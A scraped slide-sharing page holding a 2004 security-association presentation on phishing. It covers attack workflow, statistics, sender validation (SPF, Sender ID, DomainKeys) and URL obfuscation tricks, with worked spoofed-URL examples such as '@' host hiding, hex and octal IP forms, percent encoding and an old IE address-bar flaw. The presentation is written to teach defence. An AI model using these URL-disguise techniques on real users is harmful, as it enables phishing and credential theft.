3.4 Incident Response and Collaboration • Cross Border Collaboration – Police plays an important role in cross-border crimes like phishing – CERT Teams around the world are developing close collaboration in information exchange and pin down of bogus website Global Asia Pacific 104 (PHISHING ) http://www.cert.org/csirts/images/map-full.gif
3.5 Long Term Development (Technology Infrastructure) PHISHING & SPAM One of the Core Issues: How to validate identity of Sender and Sender Domain, and if the Sending Mail Server is authorized? • In the current Internet Mail Infrastructure implementation, there is flaw in the validation of sender Plausible but not widely implemented methods of validation • Sender Validation – Use Digital Signature (S/MIME or PGP) • Authenticated SMTP to minimize abuse of Open Mail Relay – RFC2554 - SMTP Service Extension for Authentication – RFC2487 - SMTP Service Extension for Secure SMTP over TLS 105 (PHISHING )
3.5 Long Term Development (Technology Infrastructure) • Domain Validation (work at DNS level) – Standard based • Reverse DNS Lookup – Proprietary Solution • AOL: SPF Sender ID • Microsoft: Caller ID • Yahoo: Domain Keys 106 (PHISHING )
Sender Policy Framework SPF DNS server of SENDER.COM 2. Recipient Mail Gateway 3. DNS server returns a list of issues a DNS query to authorized IP addresses of SENDER.COM, asking for mail servers for the list of authorized IP addresses of mail servers ? SENDER.COM 4.Check if the Sender Mail Server is in the authorized IP address. If so, the mail server is authorized and mail is forwarded to recipient’s 1.Sender sends out email from SENDER.COM mailbox SMTP Sender Recipient Mail Server Mail Gateway Recipient 107 (PHISHING )
Proprietary Domain Validation • Caller ID – “XML version of SPF” with more options • Domain Keys – Use PKI. Validate sender identity AND message integrity • Recent Development – Domain Keys was submitted as RFC to IETF – SPF merge with Caller ID to Sender ID. – SenderID submitted to IETF as RFC in July 2004; got rejected in Oct 2004 due to compatibility and IP issue. Microsoft had re-submitted with amendment. The industry is still discussing the new amendment. 108 (PHISHING )
3.5 Long Term Development (Legislation) PHISHING & SPAM – Legislate on cross-border jurisdiction, and establish mutually accepted process to handle phishing and spamming – Legislate on anti-spam, to reduce Open Mail Relay and Directory Harvesting Attacks 109 (PHISHING )
Conclusion • Phishing adversely impacts the growth of e-Commerce • Phishermen are using both old social engineering tricks and more advanced technologies now. • Should adopt Multi-dimensional Anti-Phishing Strategies – User Education, Prevention, Detection, Incident Response and Notification – Collaboration of Law Enforcement and Business sector, and crossing the border are vital elements of success. • Hit SPAM can hit Phishing. There is a need for legislative and technological reforms. 110 (PHISHING )

Empfohlen

Anti phishing
Anti phishingAnti phishing
Anti phishingShethwala Ridhvesh
 
Phishing technology
Phishing technologyPhishing technology
Phishing technologyPreeti Papneja
 
Phishing
PhishingPhishing
Phishingdefquon
 
Phishing
PhishingPhishing
PhishingSagar Rai
 
Phishing attacks ppt
Phishing attacks pptPhishing attacks ppt
Phishing attacks pptAryan Ragu
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharksNalneesh Gaur
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
 
Intro phishing
Intro phishingIntro phishing
Intro phishingSayali Dayama
 

Empfohlen

Anti phishing
Anti phishingAnti phishing
Anti phishingShethwala Ridhvesh
 
Phishing technology
Phishing technologyPhishing technology
Phishing technologyPreeti Papneja
 
Phishing
PhishingPhishing
Phishingdefquon
 
Phishing
PhishingPhishing
PhishingSagar Rai
 
Phishing attacks ppt
Phishing attacks pptPhishing attacks ppt
Phishing attacks pptAryan Ragu
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharksNalneesh Gaur
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
 
Intro phishing
Intro phishingIntro phishing
Intro phishingSayali Dayama
 
Strategies to handle Phishing attacks
Strategies to handle Phishing attacksStrategies to handle Phishing attacks
Strategies to handle Phishing attacksSreejith.D. Menon
 
Phishing
PhishingPhishing
PhishingArpit Patel
 
Phishing Attack : A big Threat
Phishing Attack : A big ThreatPhishing Attack : A big Threat
Phishing Attack : A big Threatsourav newatia
 
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Er. Rahul Jain
 
A presentation on Phishing
A presentation on PhishingA presentation on Phishing
A presentation on PhishingCreative Technology
 
Phishing
PhishingPhishing
PhishingJayaseelan Vejayon
 
Phishing
PhishingPhishing
PhishingAlka Falwaria
 
Phishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You SafePhishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You SafeCheapSSLsecurity
 
Ict Phishing (Present)
Ict Phishing (Present)Ict Phishing (Present)
Ict Phishing (Present)aleeya91
 
Phishing
PhishingPhishing
PhishingSouganthikaSankaresw
 
Phishing
PhishingPhishing
PhishingArchit Mohanty
 
Phishing
PhishingPhishing
PhishingSyeda Javeria
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldAvishek Datta
 
Phishing scams in banking ppt
Phishing scams in banking pptPhishing scams in banking ppt
Phishing scams in banking pptKrishma Sandesra
 
Phishing Presentation
Phishing Presentation Phishing Presentation
Phishing Presentation Nikolaos Georgitsopoulos
 
Phishing
PhishingPhishing
Phishingshivli0769
 
Phishing
PhishingPhishing
PhishingKiran Patil
 
PPT on Phishing
PPT on PhishingPPT on Phishing
PPT on PhishingPankaj Yadav
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till nowelakkiya poongunran
 
Phishing
PhishingPhishing
Phishinganjalika sinha
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORTvineetkathan
 
Phishing awareness
Phishing awarenessPhishing awareness
Phishing awarenessPhishingBox
 

Weitere ähnliche Inhalte

Was ist angesagt?

Strategies to handle Phishing attacks
Strategies to handle Phishing attacksStrategies to handle Phishing attacks
Strategies to handle Phishing attacksSreejith.D. Menon
 
Phishing Attack : A big Threat
Phishing Attack : A big ThreatPhishing Attack : A big Threat
Phishing Attack : A big Threatsourav newatia
 
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Er. Rahul Jain
 
Phishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You SafePhishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You SafeCheapSSLsecurity
 
Ict Phishing (Present)
Ict Phishing (Present)Ict Phishing (Present)
Ict Phishing (Present)aleeya91
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldAvishek Datta
 
Phishing scams in banking ppt
Phishing scams in banking pptPhishing scams in banking ppt
Phishing scams in banking pptKrishma Sandesra
 

Was ist angesagt? (20)

Strategies to handle Phishing attacks
Strategies to handle Phishing attacksStrategies to handle Phishing attacks
Strategies to handle Phishing attacks
 
Phishing
PhishingPhishing
Phishing
 
Phishing Attack : A big Threat
Phishing Attack : A big ThreatPhishing Attack : A big Threat
Phishing Attack : A big Threat
 
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
 
A presentation on Phishing
A presentation on PhishingA presentation on Phishing
A presentation on Phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You SafePhishing Scams: 8 Helpful Tips to Keep You Safe
Phishing Scams: 8 Helpful Tips to Keep You Safe
 
Ict Phishing (Present)
Ict Phishing (Present)Ict Phishing (Present)
Ict Phishing (Present)
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark WorldPhishing--The Entire Story of a Dark World
Phishing--The Entire Story of a Dark World
 
Phishing scams in banking ppt
Phishing scams in banking pptPhishing scams in banking ppt
Phishing scams in banking ppt
 
Phishing Presentation
Phishing Presentation Phishing Presentation
Phishing Presentation
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
PPT on Phishing
PPT on PhishingPPT on Phishing
PPT on Phishing
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
 
Phishing
PhishingPhishing
Phishing
 

Andere mochten auch

PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORTvineetkathan
 
Phishing awareness
Phishing awarenessPhishing awareness
Phishing awarenessPhishingBox
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
 
Behaviour Change and Cyber-Security
Behaviour Change and Cyber-SecurityBehaviour Change and Cyber-Security
Behaviour Change and Cyber-Securityjoinson
 
Quick & Dirty Tips for : Better PowerPoint Presentations Faster
Quick & Dirty Tips for : Better PowerPoint Presentations FasterQuick & Dirty Tips for : Better PowerPoint Presentations Faster
Quick & Dirty Tips for : Better PowerPoint Presentations FasterEugene Cheng
 
P H I S H I N G
P H I S H I N GP H I S H I N G
P H I S H I N Gbensonoo
 
Cyber crime ppt
Cyber crime pptCyber crime ppt
Cyber crime pptMOE515253
 

Andere mochten auch (9)

PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORT
 
Phishing awareness
Phishing awarenessPhishing awareness
Phishing awareness
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Behaviour Change and Cyber-Security
Behaviour Change and Cyber-SecurityBehaviour Change and Cyber-Security
Behaviour Change and Cyber-Security
 
Quick & Dirty Tips for : Better PowerPoint Presentations Faster
Quick & Dirty Tips for : Better PowerPoint Presentations FasterQuick & Dirty Tips for : Better PowerPoint Presentations Faster
Quick & Dirty Tips for : Better PowerPoint Presentations Faster
 
P H I S H I N G
P H I S H I N GP H I S H I N G
P H I S H I N G
 
Cyber crime ppt
Cyber crime pptCyber crime ppt
Cyber crime ppt
 
8 Tips for an Awesome Powerpoint Presentation
8 Tips for an Awesome Powerpoint Presentation8 Tips for an Awesome Powerpoint Presentation
8 Tips for an Awesome Powerpoint Presentation
 

Ähnlich wie Phishing exposed

Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsIRJET Journal
 
Identity Theft
Identity TheftIdentity Theft
Identity TheftSimpletel
 
IRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET Journal
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsGDSCCVR
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by DownloadsStop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by DownloadsInvincea, Inc.
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.pptKaukau9
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trumpMAXfocus
 
Phishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsPhishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsIRJET Journal
 
Webinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at HomeWebinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at HomeWPICPE
 
2011-10 The Path to Compliance
2011-10 The Path to Compliance 2011-10 The Path to Compliance
2011-10 The Path to Compliance Raleigh ISSA
 
What Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For HackersWhat Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For HackersJaime Manteiga
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2Gaurav Srivastav
 
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...REVULN
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESAM Publications,India
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfarri2009av
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptschwarz10
 

Ähnlich wie Phishing exposed (20)

Phishing
PhishingPhishing
Phishing
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
 
Identity Theft
Identity TheftIdentity Theft
Identity Theft
 
IRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing Techniques
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by DownloadsStop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trump
 
Phishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsPhishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification Algorithms
 
Webinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at HomeWebinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at Home
 
2011-10 The Path to Compliance
2011-10 The Path to Compliance 2011-10 The Path to Compliance
2011-10 The Path to Compliance
 
What Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For HackersWhat Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For Hackers
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Novinky F5
Novinky F5Novinky F5
Novinky F5
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
 
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 

Phishing exposed

  • 1. Supported by Computer Studies Division, City University of Hong Kong
  • 2. Presented by Mr. Alan Lam Mr. Bernard Kan Mr. S.C. Leung 2 (PHISHING )
  • 3. Disclaimer • This material is NOT intended to be adopted in the course of attacking any computing system, nor does it encourage such act. • PISA takes no liability to any act of the user or damage caused in making use of this report. • The points made here are deliberately kept concise for the purpose of presentation. If you require technical details please refer to other technical references. 3 (PHISHING )
  • 4. Copyright • The copyright of this material belongs to the Professional Information Security Association (PISA). • A third party could use this material for non-commercial purpose, given that no change in the meaning or interpretation of the content was made and reference is made to PISA. All rights are reserved by PISA. 4 (PHISHING )
  • 5. Agenda 1. Overview of Phishing ? 1.1 What is Phishing? 1.2 Examples of Phishing .. email, web site 1.3 Current Profile of Phishing Attack 2. Attack Strategies & Technologies and Defenses 2.1 Cousin URL Attack 2.2 URL Obfuscation Attack 2.3 Face Lift Attack 2.4 Cross-site Scripting Attack 2.5 Visual Spoofing Attacks 2.6 Other Attacks 3. Defense Strategies Against Phishing Attack 3.1 Policy and User Education 3.2 Prevention 3.3 Detection 3.4 Incident Response and Collaboration 5 3.5 Long Term Dev’t in technology infrastructure and legislation (PHISHING )
  • 6. 1.1 What is Phishing? Phishing attacks use 'spoofed' e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc. Quoted from http://www.antiphishing.org 6 (PHISHING )
  • 7. Origin of Term • Phreaking + Fishing = Phishing • Phreaking: exploiting vulnerability of phone system to make calls without paying in the 70’s • Fishing : Use of bait to get target on hook • 7 (PHISHING )
  • 8. Why Phishing becomes a threat to us? • Online transaction, such as e-banking, becomes more and more popular – Versign July 2004 report: eCommerce yearly increase by 13.2% • In order to make their online transaction service easy to use an please their d customers, some service providers sacrifice good security feature, such as user certificate. • Fantasy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web vulnerabilities which may not be caught up by most service providers and browser vendors. And these web features are supported by most email/newsreaders, search engines, chat rooms, or ICQ. • Spamming technology and facilities are becoming mature. Legislation in this area cannot catch up. • Internet being a Virtual World, it lacks a physical identity for user to validate. Trust building is an intrinsic problem. • The current Internet infrastructure is insecure by default. • It is much cheaper and safer for attackers to carry out fraud in the Internet. • All the above points encourage attackers to gain financial profit by Phishing attack. 8 (PHISHING )
  • 9. How does Phishing work? • Social engineering used in the crafted Spam email and Fake web site – Use spoofed identity (of trusted organization) to gain trust – Use the wording and tune that the trusted organization usually uses – Emphasize an urgency to “update” or “validate” data to rectify problem – Threaten to terminate account or process the mistaken transaction – Inform user to get free coupon or win lottery because of product promotion • Luring victim to a bogus website (the net in fishing) – Convincing URL – Disguised web interface • Make the bogus web site look like the original web site. • Detail level down to fonts, company logo, or even the browser UI – When users login the bogus website, username and password are captured. 9 (PHISHING )
  • 10. Workflow of Phishing Attack 1. Preparation a. Research and Development • Identify the target organization • Identify the vulnerability of the target organization web page • Iidentify the vulnerability of email reader and web browser that can facilitate the attack b. Prepare scam email and Capture website according to the above collected information c. Gather or purchase email addresses d. Ride on SMTP Open Relay or purchase similar services 2. Attacking a. Send out scam mail (the bait) via open relay server / services b. Post the scam mail to newsgroups, chartrooms, ICQ messages or Banner advertising c. Submit the bogus website to search engines d. Wait for victim at the Capture Website (the trapping net) 3. Harvesting a. Capture data collected at Capture Website b. Use or Sell the data or captured hosts… 10 (PHISHING )
  • 11. Phishing Categories Attackers’ Objectives – Fraud in money transfer – Fraud in personal information theft – Installing Key Logger and Trojan for other purposes such as proxy for other attacks Loss and Damage – Financial – Leakage of sensitive information – Control of computer fallen to attacker – Damage to branding and corporate image – Damage to consumer confidence in online transaction and eventually impact Image Source: www.jcsbank.com/ phishing.html development of e-Commerce 11 (PHISHING )
  • 12. Demonstration 1 Examples of Phishing PayPal Ebay Hang Seng Bank HSBC Citibank US Bank SunTrust Bank Citizens Bank 12 (PHISHING )
  • 13. 1.3 Current Profile of Phishing Attack References • Verisign Internet Intelligence Briefing (2004-07) – http://www.verisign.com/stellent/groups/public/documents/white_paper/00 6583.pdf • Anti-Phishing Working Group (APWG) Trend Report (2004-06) – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf • Gartner Report (2004-06) – Internet Banking Fraud had brought about loss of US$2.4B – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004 /06/21.html#a692 • Hong Kong Police Statistics (2004-07) 13 (PHISHING )
  • 14. Anti-Phishing Working Group Trend Report (2004-06) Monthly Unique phishing attacks 1500 1422 1125 1197 Count of unique 1000 attacks 402 500 282 176 0 Jan-04 Feb-04 Mar-04 Apr-04 May-04 Jun-04 Month 14 (PHISHING )
  • 15. Phishing Attack Target (APWG 2004-06) 1. Citibank 2. eBay 3. US Bank 4. Pay Pal 12 VISA 17. HSBC 15 (PHISHING )
  • 16. Phishing Web site location Verisign (2004-07) APWG (2004-06) Verisign APWG Country Percentage Country Percentage USA 63 USA 27 South Korea 10 South Korea 20 Mainland China 5 Mainland China 16 Brazil 2 Taiwan 7 Poland 2 Holland 3 • Phishermen usually choose location (APWG 2004-06) – Where there is language or time zone difference with brand owner, to create the barrier to close down the bogus web site – On compromised machines (25% by analysis) 16 (PHISHING )
  • 17. Phishing Sender Source • Verisign (2004-07) • APWG (2004-06) 2% 5% 1% 7% 92% 93% Spoofed Address Spoofed Address Cousin Address Cousin Address Web Email Address Web Email Address 17 (PHISHING )
  • 18. Phishing impact can be great • Impact to USA (Gartner Report 2004-06) – 57 million US consumers attacked – 3-5% recipients became victims – About 1.98 million reported their account intruded – Loss involved was US$2.4 billion (average loss per victim US$1,200) 18 (PHISHING )
  • 19. Phishing and Bogus Website in Hong Kong Phishing and Bogus Website Report 50 45 Reported Cases 40 36 30 30 28 25 20 14 10 3 3 4 4 3 4 1 2 1 2 2 2 0 0 0 0 0 1 1 1 0 04 3 3 03 04 3 4 4 3 4 4 3 3 v-0 l-0 p-0 b-0 r-0 g-0 r-0 -0 c-0 t-0 n- n- n- Ju ay Ma Ap No Oc Ju De Ju Ja Fe Se Au M Phishing Report Bogus Website Source: Hong Kong Police Force 19 (PHISHING )
  • 20. 2. Attack Strategies and Technologies • Before 2003, Social Engineering was the major attack – Email with impersonated name and logo, together with disguised tone of messages – Two technical tricks were also used • Cousin URL carry similar • Bogus URL using old techniques • Since 2003, technologies emerged to trick the browser, or even mimic the SSL web page style • Face Lift • Bogus URL using new techniques • Cross-site Scripting • Visual Spoofing • Other attacks 20 (PHISHING )
  • 21. 2.1 Cousin URL Hong Kong Banking Some Cousin URL as example Bogus Websites (Red: Bogus Cousin URL) 2003 (Jan-Dec) 8 cases • ? ? ? ? (www.hkbea.com) 2004 (Jan - Jul) 18 cases • www.eastasiacredit.com • www.onlinebea.com • ? ? ? ? (www.hsbc.com) • www.hkhsbc.com • ? ? ? ? (hk.dbs.com) • www.dbshk.net • ? ? ? ? (www.standardchartered.com) • www.scbltd.com • ? ? ? ? (www.dahsing.com) • www.dasxin.com • www.dlfh.com • ? ? ? ? (www.iba.com.hk) • www.ibabankhk.com Source: • www.hkiba.com Hong Kong Police Force • More… 21 (PHISHING )
  • 22. Cousin URL: https://visa-secure.com/personal/secure_with_visa/ 22 (PHISHING )
  • 23. 2.2 URL Obfuscation Attack • Normal representation of URL – Domain: http://www.pisa.org.hk • Dotted representation of IP address URL – Decimal: http://202.81.255.242 – Hexadecimal: http://0xca.0x51.0xff.0xf2 – Octal http://0312.0121.0377.0362 • Dot-less representation of IP address URL – Decimal: http://3639552355 http://7689338866 … – Hexadecimal: http://0xCA51FFF2 – Reference: A dot-less Decimal IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi 23 (PHISHING )
  • 24. 2.2 URL Obfuscation Attack • Valid Use of “@’ – “RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows a valid Uniform Resource Locators (URL) syntax <user>:<password>@<host>:<port>/<url-path> – Application: use URL to carry username and password, e.g. • ftp://user1:pass@myftp.com:1021/public/file1.gzip • Malicious Use of “@’ to hide bogus host – http://www.microsoft.com@www.pisa.org.hk – http://www.microsoft.com@202.81.255.242 (IP address) – http://www.microsoft.com@3394371570 (decimal representation) – http://www.microsoft.com111111111111111111111111111111111111 11111111111111111111111@3394371570 • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice 24 (PHISHING )
  • 25. 2.2 URL Obfuscation Attack • Escaped Encoding (or % encoding) – RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows URL encoded as ASCII in Hexadecimal representation – ”%##” (## : 00 – FF) • %20= [space], %2E=“.”, %7E=“~” • %31=“1”, %32=“2” • %41=“A”, %61=“a” – Where will this URL bring you to? • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D http://www.microsoft.com@yahoo.com • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice • Reference of % Encoding and online encode/decoder http://www.blooberry.com/indexdot/html/topics/urlencoding.htm 25 (PHISHING )
  • 26. 2.2 URL Obfuscation Attack • Other derived formats of URI – Unicode encoded URL • Unicode was designed to allow multiple language implementations of the ASCII character set • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;& #46;&#111;&#114;&#103;&#46;&#104;&#107; – Mixed Unicode and ASCII • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%6 7%2E%68%6B • References Unicode Encoding: http://www.unicode.org/ Free Online UTF Decoder (choose “Freeform numeric): http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder 26 (PHISHING )
  • 27. 2.2 URL Obfuscation Attack • IE or other browser Vulnerability in displaying proper URL at – Status Bar – Address Bar 27 (PHISHING )
  • 28. URL Obfuscation Attack (Status Bar) • Inline Javascript – <A Href= … onMouseOver=..> • <Form> • <Table> • <Table Border> • <Image Map> 28 (PHISHING )
  • 29. URL Obfuscation Attack (Address Bar) (IE vulnerability in displaying URL) • IE 5.x ? 6.0 has a vulnerability in handling URL. When the URL contains special characters, the character string after the special character cannot be displayed. (Microsoft knowledgebase article 834489) • For example, use escaped encoded characters %00 (null character) and %01 – http://www.yahoo.com%01%00@www.pisa.org.hk – http://www.yahoo.com%01%00@202.81.255.242 – http://www.yahoo.com%01%00@3394371570 • IE will bring user to “www.pisa.org.hk”, whereas the Address bar and Status bar cannot display the true visited URL! 29 (PHISHING )
  • 30. IE vulnerability in displaying URL • MS04-004 (2004-02) released a patch to remove support in HTTP to the URI format <user>:<password>@ <host>:<port>/<url-path> http://www.microsoft.com/technet/s ecurity/Bulletin/MS04-004.asp • However, after applying the patch, Address bar and Status bar still do NOT display the correct URL. 30 (PHISHING )
  • 31. Known Attack using the MS04-004 • Exploit-URLSpoof Trojan • McAfee alert http://vil.nai.com/vil/cont ent/v_100927.htm 31 (PHISHING )
